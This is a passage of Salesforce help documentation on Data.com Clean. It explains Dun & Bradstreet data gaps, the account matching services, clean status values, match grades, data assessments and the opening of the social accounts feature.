Dun & Bradstreet (D&B) collects revenue data for headquarters and single locations only, so records associated with branch
locations won’t have a value for the Annual Revenue field on account and leads records or the Annual Sales Volume
field on D&B Company records.
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Similarly, D&B doesn’t always have confirmed employee counts for branches and single locations, so there might not be a
value for the Number of Employees field on lead records, the Employee field on account records, or the Number of
Employee–Total field on D&B Company records.

See Also:
Data.com FAQs

Why do some leads have a blank or zero (0) value in the Annual
Revenue and Number of Employees fields after I use the Data.com
Clean auto-fill feature?

Data.com Clean has improved its location-based matching and, as a result, contacts are now associated with their actual
location, rather than the organization’s headquarters location. Because Dun & Bradstreet (D&B) only collects revenue data
for headquarters locations, leads associated with a branch location or single location won’t have a value for the Annual
Revenue field. Similarly, D&B doesn’t always have confirmed employee counts for branch and single locations, so there
might not be a value for the Number of Employees field on lead records.

If you want to map the revenue and employee data from the headquarters location to the branch or single location records,
contact your Salesforce administrator.

See Also:
Data.com FAQs

When I use the Employees or Revenue filter to refine my account or
contact search results, I get far fewer results than I expect. Why?

Dun & Bradstreet (D&B) doesn’t collect revenue data for branch locations and doesn’t always have confirmed employee counts
for branches or single locations. Therefore, if you enter 1 as your minimum range in the Revenue filter, your search results
will exclude all records that have a zero (0) Revenue value. Similarly, if you enter 0 as your minimum range in the Revenue
filter, your search results will exclude all records that have a blank Revenue value. The Employee filter works the same way.

If you want all records with a zero (0) or blank Revenue or Employee value included in your filtered search results, be sure to
leave the Min field blank.

See Also:
What does the Account Site field value on an Account record mean?
Data.com Contact Search Fields and Filters
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Why do some account and D&B Company records have identical D-U-N-S
Numbers?

If a company operates within a single country, its Global Ultimate (highest entity within an organization) and Domestic
Ultimate (highest entity within an organization in a country) are the same entity, and therefore the values in their D-U-N-S
Number fields are the same. For definitions of all the D&B fields, see D&B Company Fields.

See Also:
Data.com FAQs

What is the difference between the Account Site and Location
Type fields?
Account Site is the field found on account records and the Data.com account card. Location Type is the field found
on D&B Company records. (D&B Company records are available to organizations that have purchased Data.com Premium
Prospector.) Both fields contain the same values: Single location, Headquarters/Parent, and Branch.

See Also:
What does the Account Site field value on an Account record mean?
D&B Companies Overview

CLEANING YOUR ACCOUNTS, CONTACTS, AND LEADS

Data.com Clean Overview
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Data.com Clean is an important part of the Salesforce Data.com product suite, offering both manual and automated cleaning
for your account, contact, and lead records. Data.com Clean provides full clean capability for your organization: all Data.com
Clean users can manually clean Salesforce accounts, contacts, and leads, and you can configure jobs to flag field value differences
on Salesforce records or automatically fill blank fields. Data.com Clean does not support person accounts.

Clean works by comparing your Salesforce account, contact, and lead records with records from Data.com, linking records
that match, and providing clean status information on the Salesforce record. You can choose to implement Clean for accounts,
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contacts, and leads, and specify whether the clean process will flag differences between the two records, or also auto-fill blank
Salesforce fields with Data.com values.

Licensed Data.com Prospector users can also clean individual records manually, comparing their fields and values side by side
with those from the linked Data.com record. Metrics and analytics provide detailed information about the value of Data.com
Clean to your organization: see how many of your Salesforce records are matched to Data.com records, and how many have
been updated by manual and automated clean processes.

See Also:
Data.com FAQs
Cleaning Records Manually with Data.com Clean
Data.com Clean Product Enablement
Analyzing Data Quality with Data.com Data Assessments
Data.com Social Key Overview—Beta

Cleaning Records Manually with Data.com Clean
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Edit” on accountsTo clean account records:

“Edit” on contactsTo clean contact records:

“Edit” on leadsTo clean lead records:

Data.com Clean includes both manual and automated clean capabilities that help ensure your CRM records are always up to
date. Manual clean works for all the account, contact, and lead records you have access to in Salesforce—not just those you
previously added from Data.com. Manual clean is available to organizations that have purchasedData.com Clean, and to any
Salesforce user with a Data.com Prospector license.

Note:  If you clean your account records with Data.com Prospector or Data.com Clean, Data.com converts non-USD
currencies to USD every month, which may cause the values in the Annual Revenue field to change. For organizations
that use non-USD currencies, we ignore the Annual Revenue field when determining a record’s clean status (so
the Clean Status field’s value does not change). We also remove the value from the Annual Revenue field on
account records and the clean comparison page.

1. Check the record’s Clean Status field.
2. If the status is Different or Not Compared, click Clean to open the comparison page and compare the Salesforce

record with Data.com’s.

Tip:  From the Clean Status field, you can also get additional status information (such as which fields have
different data in Data.com) and then clean the record. Just click the status icon ( ) and the popup will guide you.

897

Cleaning Records Manually with Data.com CleanManaging the People and Organizations You Sell To



3. Compare the two records side by side. You’ll see a check mark next to any Data.com field value that matches the
corresponding value in your Salesforce record.

4. Select the checkbox next to any Data.com value you want to accept.
5. Click Save when you’re satisfied that the record is accurate, even if you don’t accept any data from Data.com.

The Clean Status field reflects the record’s current status and its time stamp is updated to reflect your activity.

Note:  If you click Cancel, your Salesforce record’s data won’t be updated, but if Data.com finds a better match
for the record, the values in its Clean Status and Data.com Key fields may change. These two fields always
reflect the best match from Data.com as of the most recent clean process, whether the record was cleaned manually
(by you) or automatically (via Clean jobs).

If your organization uses Data.com Premium Clean or Data.com Premium Prospector and you’ve manually cleaned an
account or lead record that doesn’t yet have a D&B Company record linked to it, Salesforce will create a D&B Company
record (if available) and link it to the account or lead record when you click Save. The next time you open the comparison
page, the linked record will be identified by its D-U-N-S Number in the D&B Company Record Linked field.

See Also:
Comparing Salesforce and Data.com Data at a Glance
Understanding Data.com Clean Status

Understanding Data.com Clean Account Matching Services
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you use Data.com Prospector or Data.com Clean, you can select the matching service your organization uses to clean account
records. Here are your options.

• Data.com matching is the default matching service used by Data.com Clean. Matches are based on the Account Name,
Billing Address, Website, and Phone fields.

• DUNSRight matching is D&B’s proprietary data-quality technology, which uses a rigorous process to normalize data and
match D&B company records to your account records. The process also employs the D&B Confidence Code, which ranks
Data.com match candidates based on how similar they are to your record, from 1 (not similar) to 10 (identical or highly
similar). D&B also provides letter-coded match grades for individual fields. For details about how D&B DUNSRight
matching works, see D&B Entity Matching.

Sync BehaviorMatching Service

Based on the schedule you select, jobs will process only records of enabled objects that have Not
Compared clean status (likely because Salesforce records have changed since the previous
job was run). This is called an incremental sync.

If you schedule jobs for at least one day of the week, the first time jobs run, and two weeks
after the previous full sync job finishes, jobs will process all records of enabled CRM objects

Data.com matching
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Sync BehaviorMatching Service

(accounts, contacts, and leads) even if no records have changed. This type of job is called a full
sync, and it will run instead of the incremental sync at the same scheduled time.

Based on the schedule you select, jobs will process only records of enabled objects that have Not
Compared clean status (likely because Salesforce records have changed since the previous
job was run). This is called an incremental sync.

If you use DUNSRight matching, you can schedule a full sync of your account records
with Data.com’s the next time your account clean jobs run. The full sync job will

D&B DUNSRight matching

run instead of the incremental sync. After the requested full sync runs, this option is turned
off. You can turn it back on and run another full sync once every 30 days.

Before selecting a matching service, consider the following.

• Changing the matching service might affect your organization’s match rates.

• Neither matching service supports person accounts because person accounts are excluded from Clean jobs.

• If you’ll be cleaning account records from non-English speaking countries, we recommended that you use D&B DUNSRight
matching.

• Data.com Clean always uses the D-U-N-S Number field to match (or look up) accounts records. Any account record
without a D-U-N-S Number will be matched using whichever matching service was selected (either Data.com matching
or D&B DUNSRight matching).

• If, after changing matching services, you want to do a one-time rematch using the new matching service, you can manually
remove the D-U-N-S Number on account records to force the matching service to rematch the records. Be aware that this
might affect your match rates.

• If you use DUNSRight matching, for the D-U-N-S Number field you cannot map a custom field or skip mapping. We
don’t recommend mapping a custom field or skipping mapping for either matching service: Data.com matching or
DUNSRight.

• After you select D&B DUNSRight matching, the initial match operation will take approximately one to two seconds per
record. If your organization has a large number of account records that do not have a D-U-N-S Number, it may take
several days to complete the process.

• To improve match rates when using D&B DUNSRight matching, be sure to include a valid state or province for US- and
Canadian-based account records.

• D&B DUNSRight matching provides matching records for over 200 more countries than Data.com matching. DUNSRight
matching does not support these countries and regions: Admiralty Islands; Åland Islands; Antarctica; Ascension Island;
Bonaire; Bouvet Island; British Indian Ocean Territory; Caroline Islands; Cocos (Keeling) Islands; Cuba; Curaçao; French
Southern Territories; Guernsey; Heard Island and McDonald Islands; Isle of Man; Jersey; Korea, Democratic People's
Republic of; Mayotte; Micronesia, Federated States of; Midway Islands; Mongolia; Niue; Palau; Palestinian Territory
Occupied; Pitcairn; Saint Barthélemy; Saint Eustatius and Saba; Saint Martin (French part); Sint Maarten (Dutch part);

899

Understanding Data.com Clean Account Matching ServicesManaging the People and Organizations You Sell To



South Georgia; South Sandwich Islands; Svalbard and Jan Mayen; Timor Liste; Turkish Cyprus; United States Minor
Outlying Islands; Wake Island; Wallis and Futuna; Western Sahara.

See Also:
Understanding How Salesforce and Data.com Records are Matched
Selecting a Data.com Clean Matching Service for Account Records
Viewing Your Data.com Clean Record Match Rates
Scheduling a Full Sync of Your Salesforce Account Records with Data.com (Data.com Clean Only)

Comparing Salesforce and Data.com Data at a Glance
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

When you manually clean a Salesforce account, contact, or lead record, you compare the data in your Salesforce record with
data from Data.com. When you click the Clean button or Clean Status field value from a record , the comparison page
appears. There you’ll see the Salesforce record’s fields and values side by side with the Data.com record’s fields and values.

Cleaning records is easier if you understand how to read and use the comparison page. Here’s what you’ll find there.

1. The columns present Salesforce and Data.com records side by side, so you can easily compare the data from each source.
2. Field names appear on the left. If Data.com has no data for a field, the field name will not appear.

3. If your Salesforce data matches Data.com’s you’ll see a green check mark ( ) for that field in the Data.com column.
4. If Data.com has data for a field that’s blank or different in Salesforce, you’ll see a checkbox. Select it to accept Data.com’s

data.
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5. If you use Data.com Premium Prospector or Data.com Premium Clean, when you clean an account or lead record, we
create a D&B Company record (if one is available from Data.com and doesn’t yet exist in Salesforce) and link it to the
account or lead. The D&B Company record is identified on the comparison page.

6. If your Salesforce record is currently matched to a Data.com record and you think the match is wrong, click Wrong Match?
and select a different Data.com record. This feature is available for D&B DUNSRight matching only.

7. By default, fields that have identical data are hidden. Click Show Identical Fields to see them all, along with the
fields that have different data (as in this example). If there are a lot of fields, a scroll bar may appear. To hide identical
fields, click Hide Identical Fields.

8. Click Save when you’re satisfied that you have the data you want, even if you don’t make any changes. The Salesforce
record’s clean status will be updated to Reviewed or In Sync. If, however, the record’s clean status was Inactive,
it will remain Inactive after you click Save. If you click Cancel, your Salesforce record’s data won’t be updated, but if
Data.com finds a better match for the record, the values in its Clean Status and Data.com Key fields may change.
These two fields always reflect the best match from Data.com as of the most recent clean process, whether the record was
cleaned manually (by you) or automatically (via Clean jobs).

Note: You can’t see the entire D-U-N-S Number value for an account (on the comparison page or the account card)
until the account has been added to Salesforce from Data.com or (for existing records) cleaned with Data.com. Until
you add or clean the record, the number’s first five digits are masked with asterisks (*).

See Also:
Cleaning Records Manually with Data.com Clean
Understanding Data.com Clean Status
Selecting a Matching Record from Data.com
Selecting a Different Data.com Match for a Salesforce Account Record

Selecting a Matching Record from Data.com
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Edit” on accountsTo clean account records:

“Edit” on contactsTo clean contact records:

“Edit” on leadsTo clean lead records:

Select a Data.com Match for your Salesforce Account Record (0:47 minutes)

If your organization uses D&B’s DUNSRight Matching service to match and clean your account records, we automatically
match records according to a preset D&B confidence code, which your administrator selects. If we don’t have a record qualified
for an automatic match, but we have identified one or more potential matches, we’ll set your record’s clean status to Select
Match. This clean status lets you know you need to manually review match candidates and select one. After you select a match,
you manually clean your Salesforce record in the usual way.
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1. If you need to select an initial match, from the record, click the Select Match clean status value, then click Select
Account from Data.com.
On the select match page, you’ll see up to five match candidates, with the most similar record at the top.

2. Review the candidates. Hover over any candidate’s gray match grade bar to view the record’s D&B DUNSRight match
information, including its confidence code and match grade details (if available). The blue match grade legend shows D&B
code letters that correspond to these fields in your account record, in this order left to right.
Account Name or Tradestyle  | Street Number | Street Name | City | State / Province | Mailing Address
/ PO Box | Phone

3. Click any code letter to see the field name and an explanation.

DefinitionLetter

Values either match exactly or are similar enough that they
should be considered to match.

A

Values are similar.

In some cases, when Data.com and D&B data are updated
at different times, if a field on the D&B record is blank, the

B

match grade letter will indicate that the field values are
similar (B) instead of blank (Z).

Values do not match.F

Value is blank in one or both of the records.

When the State value is blank within a D&B record, the
Street field value is normalized to be blank. In these cases,

Z

both fields are colored gray in the match grade legend and
the match grade for each is Z.

4. Highlight the match you want, then click Select and Proceed to Clean. If you don’t find a match you want, click Cancel;
your record’s status will remain Select Match.

5. Clean the record.
The record’s Clean Status field is updated.

For example: your organization’s D&B Confidence Code setting is 9. You open your United Technologies account record to
find that its Clean Status field value is Select Match. You click the status value to open the select match page. There
you see four match candidates from Data.com. You hover over the match grade bar for the top candidate: United Technologies
Corporation. In the popup, you see that the United Technology record’s confidence code is 8. The match grade legend shows
these letters: B A A B A A Z. You know that A means the values should be considered to match, so you check out the values
that do not.

You click the first B and see that the Account Name field values are similar, but not a clear-cut match: your record’s Account
Name value does not include Corporation  while the Data.com record’s Account Name value does. You click the second
B and find that your record’s City value is Francisco while the Data.com record’s City value is San Francisco. So...
similar, but not an exact match. You click Z and see that your record’s Phone value is blank. The Data.com record’s Phone
value is +1.415.901.7000.

The Data.com United Technologies Corporation record looks like the one that matches your United Technologies record, so
you select it, then click Select and Proceed to Clean. On the comparison page, you click Select All to accept all of the Data.com
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record’s values, including the Account Name, City, and Phone values that were different or blank in your record. You click
Save and your record’s clean status changes to In Sync. Awesome.

See Also:
Selecting a Different Data.com Match for a Salesforce Account Record
Cleaning Records Manually with Data.com Clean

Selecting a Different Data.com Match for a Salesforce
Account Record

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Edit” on accountsTo clean account records:

Select a Data.com Match for your Salesforce Account Record (0:47 minutes)

If your organization uses D&B’s DUNSRight Matching service, and you believe an account record has been matched incorrectly
to a Data.com record, you may be able to match to a different Data.com record. After you select a new match, you manually
clean your record in the usual way.

1. Open the record and click Clean
2. On the comparison page, click Wrong match?
3. Select a different Data.com record, if one or more are available.
4. Click Select and Proceed to Clean

See Also:
Selecting a Matching Record from Data.com
Cleaning Records Manually with Data.com Clean
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Understanding D&B Match Grades
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Use D&B match grades to help you decide which record is the right one when selecting a match. Hover over any candidate’s
gray match grade bar to view the record’s D&B DUNSRight match information, including its confidence code and match
grade details (if available). The blue match grade legend shows D&B code letters that correspond to these fields in your account
record, in this order left to right. Account Name or Tradestyle | Street Number | Street Name | City | State
/ Province | Mailing address / PO Box | Phone

DefinitionLetter

Values either match exactly or are similar enough that they
should be considered to match.

A

Values are similar.

In some cases, when Data.com and D&B data are updated at
different times, if a field on the D&B record is blank, the

B

match grade letter will indicate that the field values are similar
(B) instead of blank (Z).

Values do not match.F

Value is blank in one or both of the records.

When the State value is blank within a D&B record, the
Street field value is normalized to be blank. In these cases,

Z

both fields are colored gray in the match grade legend and the
match grade for each is Z.
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Reviewing Data.com Clean Match Results
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com Clean:

After you complete your Data.com Clean implementation and your first Clean jobs are complete, you should regularly review
your Data.com Clean match results to make sure your records are being matched accurately. Run the Accounts by Clean Status
report to get started.

Important:  If your records appear to be matched incorrectly with Data.com records, you should consider carefully
before selecting Flag differences and auto-fill blank fields as a clean preference. If mismatches
occur with a large number of your records, contact Salesforce Support.

1. Click the Dashboards tab, then select Data.com Analytics. Run the Accounts by Clean Status report.
If your clean jobs have run successfully, you’ll find your accounts grouped by their clean status values.

Tip:  Check out the topic Understanding Data.com Clean Status on page 905 for definitions of all the clean status
values.

2. On the report, find any Salesforce records with a clean status of Different. Open several records and click Clean to
look at the differences.

3. Repeat the comparison process with records that have a clean status of Not Found.

Understanding Data.com Clean Status
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you use Data.com, the Salesforce CRM records you have access to show a status message in the Clean Status field.

To clean a record is to bring it up to date with the values you want—either accepting some or all of the latest values from
Data.com, or keeping all of the values in the Salesforce record. If a user has compared two records and opted to keep one or
more values from the Salesforce record, the record’s status is Reviewed. If the Data.com and Salesforce records are identical,
either before or after they’ve been compared by a user, the Salesforce record’s clean status is In Sync. Both Reviewed and
In Sync records are considered to be clean.

This table explains each clean status message and tells you how to clean records in other states (such as Not Compared and
Different).
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How to Clean the Salesforce RecordDefinitionClean Status

Click Clean and compare the records
side by side.

If you want to keep all of the values in
the Salesforce record, click Save. The

The current version of the Salesforce
record has not been compared with
Data.com. This status may occur because:

Not Compared

• The Salesforce record was previously
compared with Data.com, but later Salesforce record’s clean status changes

to Reviewed.edited by a user and not compared
again.

If you want to accept any or all of the
Data.com values, select the checkboxes
as appropriate, then click Save.

• The Salesforce record was previously
compared with Data.com, but later
updated by a workflow or other
automated process (such as lead The Salesforce record’s clean status

changes to Reviewed until:conversion) and not compared with
Data.com again.

• The two records are identical (In
Sync status).

• The record was created manually in
Salesforce (not added from Data.com),

• The record is updated in Salesforce
or Data.com (Different status).

and has not yet been compared with
Data.com.

• The record becomes inactive in
Data.com (Inactive status).

• You map Data.com fields to
Salesforce fields, and one or more
newly mapped Data.com fields has
no value.

Note:  Records you add from
Data.com always have an In
Sync status until the data
changes in one or both of the
records.

Click the icon in the Clean Status
field and check the time stamp to see
when the record was last compared.

When your Salesforce record was last
compared with the Data.com record, the
two were identical. Records in In Sync
status are considered to be clean.

In Sync

Click Clean and compare the records
side by side. Accept or skip Data.com
values as appropriate.

When your Salesforce record was last
compared with the Data.com record, the
user who compared them accepted one
or more field values from the Data.com

Reviewed

The Salesforce record remains in
Reviewed status until:

record and kept one or more values from
the Salesforce record. Records in
Reviewed status are considered to be

• The two records are identical (In
Sync status).

clean, but you can repeat the clean
process.

• The record is updated in Salesforce
or Data.com (Different status).

• The record becomes inactive in
Data.com (Inactive status).
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How to Clean the Salesforce RecordDefinitionClean Status

Click Clean and compare the records
side by side. Accept or skip Data.com
values as appropriate.

The Salesforce record remains in
Different status until:

The Salesforce record has different data
from the corresponding Data.com record.

Different

Note:  It’s important to
remember that a record’s clean
status can change from In
Sync or Reviewed to

• The two records are identical (In
Sync status).Different when values

change in the matched
• A user reviews the two records and

keeps one or more values from the
Salesforce record (Reviewed status).

Data.com record. This may
happen regularly as updated
information from D&B and
Data.com is made available. • The record becomes inactive in

Data.com (Inactive status).

Click Clean and review the match
candidates we suggest. Select one and

Data.com does not have a record
qualified for an automatic match but does

Select Match

proceed to clean the record in the usual
way.

have one or more potential matches. You
can select one from up to 5 match
candidates.

Available with the Data.com Clean
product and D&B DUNSRight
matching service only.

The record can't be cleaned in Salesforce
because Data.com could not find a record
to match it with.

The Salesforce record has no similar
records in Data.com record.

Not Found

Click Clean and compare the records
side by side. Accept or skip Data.com
values as appropriate.

The Data.com record corresponding to
the Salesforce record has been marked
inactive. An account, contact, or lead
record may be inactive if it contains

Inactive

The Salesforce record remains in
Inactive status.

out-of-date or inaccurate information.
An account record may also be inactive
if it’s non-marketable. A non-marketable
company, as defined by D&B, is one that
is out of business or has requested
exclusion from the D&B database. It also
includes companies whose D&B record
has not been updated in the past 24
months or does not include a complete
business name, a valid physical or mailing
address, a valid phone number, or an SIC
code. Inactive records are hidden by
default.

See Also:
Cleaning Records Manually with Data.com Clean
Working with a Record's Data.com Clean Status
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Working with a Record's Data.com Clean Status
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

The Clean Status field on account, contact, and lead records shows you the record’s Data.com Clean status at a glance,
including when the status was last updated. But if you click the icon next to the status, you’ll get more status details, plus
options for refreshing the status. Depending on the status, you can also clean some records right from the Clean Status
field. Here’s an example that shows some of your options.

1. This record’s status is Different because when it was last compared, one week before, the records in Salesforce and
Data.com had different values for some or all of their fields. The user who compared the records previously may have:

• Decided not to accept any of the Data.com values.
• Accepted some values from Data.com and kept some Salesforce values.
• Clicked Cancel on the comparison page.

Click the icon to view the popup, which provides additional information and Clean options.
2. This line tells you about the Salesforce record’s most recent comparison activity.

In this case, a user compared the Salesforce account record with Data.com’s version one week ago.

3. This section provides more details about the comparison. In this case, Data.com had different Email, Phone, and Mailing
Address values for the contact.

4. You can click the Clean... link to compare the Salesforce and Data.com records yourself.

If you click Cancel, the record’s clean status will remain Different. If you click Save, even if you haven’t accepted any
Data.com values, the record’s clean status will be Reviewed.

.
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Understanding How Salesforce and Data.com Records are
Matched

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you clean your Salesforce account, contact, and lead data with Data.com, it’s important to understand how your Salesforce
records are compared and matched with records from Data.com.

Tip:  For complete details about how the Data.com matching service works, including a graphic overview and extensive
examples, please see our white paper, Data.com Record Matching in Salesforce.

Salesforce and Data.com records can be compared and matched in two ways.

• Manually, when a user clicks Clean on an individual account, contact, or lead record.

• Via Clean jobs, which automatically attempt to match all your account, contact, or lead records.

Automated clean jobs are only available to organizations that purchase Data.com Clean. Manual clean is available to all licensed
Data.com Prospector users.

The first time a Salesforce record is cleaned—either manually or via automated job—the matching service searches Data.com
for similar records. It examines the field values in each record and looks for enough identical or similar information to indicate
that the two records represent the same entity (that is—the same account, contact, or lead). If Data.com finds a match, the
two records are linked by a numeric value in the Data.com Key field. For contact and lead records, every time the Salesforce
record is cleaned, the matching service is used to match the record. For account records, every time the Salesforce record is
cleaned, the D-U-N-S Number field is used to match (or look up) the record. If the D-U-N-S Number field is blank, the
matching service will be used to find a match. If the Salesforce record changes substantially, the next time it is cleaned, the
matching service may look for a better match from other Data.com records.

Note:

• If you prefer to rematch account records with the matching service, regardless of whether a D-U-N-S Number
is present, please contact salesforce.com Customer Support. Doing so, however, may cause some account records
to have the Data.com Clean Not Found status.

• If you’ve remapped or skipped mapping for the D-U-N-S Number field, or if you’re organization purchased
Data.com prior to December 16, 2011, the matching service will automatically be used to rematch account records.

For contacts and leads, the important fields are:

• Name

• Email

Ideally, use a direct email address rather than a group address like info@org.com. (Identical Email values will almost always
trigger a match unless other values in the record conflict.) Note: Data.com does not store emails that may be personal
contact information, such as those from Gmail or Yahoo.

• Account Name for contacts; Company for leads.

909

Understanding How Salesforce and Data.com Records are
Matched

Managing the People and Organizations You Sell To

http://na1.salesforce.com/help/doc/en/datacom_salesforce_record_matching.pdf


• Title

• Phone

For accounts, the important fields are:

• Account Name

◊ Make sure the account name doesn't contain any unrelated artifacts, such as numbers (1002), special characters (!#@#),
or unrelated words. (These symbols are acceptable if they are part of the company’s name.)

◊ Try to avoid country and state names as values unless they are part of the company’s name.

◊ If the account name contains more than one word, like DSGI Business (PC World Business) try both of
them.

◊ If an account name is also a Website (like salesforce.com), try leaving off the subdomain (.com and the like).

• Billing Address

◊ Use a full address if possible

◊ Make sure the Country field value is correct. If you don’t know the country, leave the field blank.

◊ Make sure to specify the State or ZIP code value if you know it.

◊ If you know the account’s street name but not its street number, use the street name only. A street name without a
street number is better than no value.

• Website

• Phone

ANALYZING ACCOUNT, CONTACT, AND LEAD DATA QUALITY

Analyzing Data Quality with Data.com Data Assessments
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

No permissions requiredTo run a Data.com data assessment:

No permissions requiredTo view a Data.com data assessment:

How many of your organization's records can Data.com enrich with more and better data? Data.com Assessments can tell
you. It can also identify how many of your records have been marked as Inactive in Data.com, and if you request, how
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many records in your Salesforce organization appear to be duplicates. Data assessments also list the fields on accounts, contacts,
and leads, and tell you how many are blank within your records and how many have different values from Data.com’s. (For
example, you may have 10 account records in which the Phone field value is blank, or five contacts in which the Account
Name field is blank.)

Data.com Data Assessments is a freeAppExchange package. Work with your salesforce.com sales representative to get it for
your organization.

1. Contact your salesforce.com sales rep to get Data Assessments.
2. Set up and run an assessment.
3. View your assessments.

See Also:
Understanding Data.com Clean Status
Viewing and Understanding Data.com Data Assessments

Installing and Implementing the Data.com Data
Assessments AppExchange Package

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Download AppExchange Packages”To install packages:

No permissions requiredTo run a Data.com data assessment:

No permissions requiredTo view a Data.com data assessment:

1. Install the package using the link you received from salesforce.com. Contact your sales representative if you do not have a
link.

2. Let your users know that Data.com Data Assessments is available.
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Running Data.com Data Assessments
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo run a Data.com data assessment:

No permissions requiredTo view a Data.com data assessment:

To run a data assessment, your organization must have the Data.com Data Assessments AppExchange app installed Contact
your salesforce.com sales rep if you need Data Assessments.

Data.com Data Assessments is a Salesforce AppExchange package that tells you how many of your organization's records
Data.com can enrich with more and better data. It can also tell you how many of your records have been marked as Inactive
in Data.com, and if you request, how many records in your Salesforce organization appear to be duplicates. Data assessments
also list the fields on accounts, contacts, and leads, and tell you how many are blank within your records and how many have
different values from Data.com’s. Your organization can request one assessment every 30 days.

1. From the Force.com app menu, select Data.com Assessment to open the Data Assessment app.
2. Click the Data.com Assessment tab and define your assessment preferences.
3. Click Start My Assessment. We’ll tell you how long we expect it to take.

Viewing and Understanding Data.com Data Assessments
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

No permissions requiredTo run a Data.com data assessment:

No permissions requiredTo view a Data.com data assessment:

When your Data.com data assessment is complete, you can take a look, and learn how Data.com can enhance your CRM
records. You can also view previous assessments run by you or other users in your organization.

Tip:

• For more information about clean status values, including those provided in data assessments (In Sync,
Different, and Inactive) see Understanding Data.com Clean Status on page 905.

• To learn more about how Data.com matching works, check out our white paper: Data.com Record Matching in
Salesforce.
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1. If you need to, from the Force.com app menu, select Data.com Assessments.
2. Click the Data.com Assessment tab, then click the Assessments tab.
3. Click View Assessments next to the assessment you want.
4. Click through the assessment tabs. Here’s what you’ll find.

What it Tells YouTab

Breaks down the set of records we analyzed for the assessment. It tells you how many we can
enrich with better data, how many records are likely to be inactive in Data.com and if you

Summary

requested it when you ran the assessment, how many of your records are likely to be duplicates.
We also tell you how many of your records were matched to Data.com records and how many
were not.

Breaks down the account records we matched, showing the number and percentage of records
by status and identifying the match percentage. Data assessments also list Account fields and

Accounts

for a given field, tell you how many records have blank values for that field and how many
have values that are different from Data.com’s. (For example, you may have 10 account records
in which the Phone field value is blank.)

Breaks down the contact records we matched, showing the number and percentage of records
by status and identifying the match percentage. Data assessments also list Contact fields and

Contacts

for a given field, tell you how many records have blank values for that field and how many
have values that are different from Data.com’s. (For example, you may have five contact
records in which the Account field value is blank.)

Breaks down the lead records we matched, showing the number and percentage of records
by status and identifying the match percentage. Data assessments also list Lead fields and for

Leads

a given field, tell you how many records have blank values for that field and how many have
values that are different from Data.com’s. (For example, you may have 12 lead records in
which the Title field value is different from Data.com’s.)

Data.com's matching algorithm uses key fields to identify matching records. This tab lists
those fields, and shows you the number and percentage of blank field values within your

Unmatched

unmatched records. Adding valid data to these fields will most likely improve your
organization’s match results.

See Also:
Analyzing Data Quality with Data.com Data Assessments
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VIEWING SOCIAL NETWORK DETAILS FOR ACCOUNTS AND
CONTACTS

Social Accounts, Contacts, and Leads Overview

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

The Social Accounts and Contacts feature provides easy access to social network profiles and other social information for your
accounts, contacts, and leads, directly in Salesforce. This social intelligence gives your users the advantage they need to better
serve their current and potential customers.. The Social Accounts and Contacts feature is enabled by default for organizations
created after the Spring ’12 release. For organizations created before that release, the administrator must enable Social Accounts
and Contacts.

Organizations that use the Data.com Clean product also get Data.com Social Key (in beta release for Summer ’13), which
makes finding contacts’ social information even easier. Data.com Clean’s automated clean jobs search LinkedIn, Twitter, and
Facebook for your contacts’ social handles, and add them automatically to your contact records. You’ll only have to select the
social network profile you want if we find multiple social network profiles that might match your contact.

Note:  In the online help and other Salesforce documentation, the word “account” by itself always refers to both
business accounts and person accounts. The terms “business account” and “person account” are used when there are
differences between the two kinds of accounts.

You can see social information from several social networks.

Supported ObjectsWhat you see in SalesforceSocial
Network

Accounts (does not include Social
Key)

Facebook® gives you a more personal view of your existing and potential
customers and helps you find common interests. For contacts, leads, and

Facebook

person accounts, you can see profiles, status updates, and the number of Contacts
mutual friends you share. For business accounts, you can view your customers’

Leadscorporate social media presence, including their company profile and wall
posts.
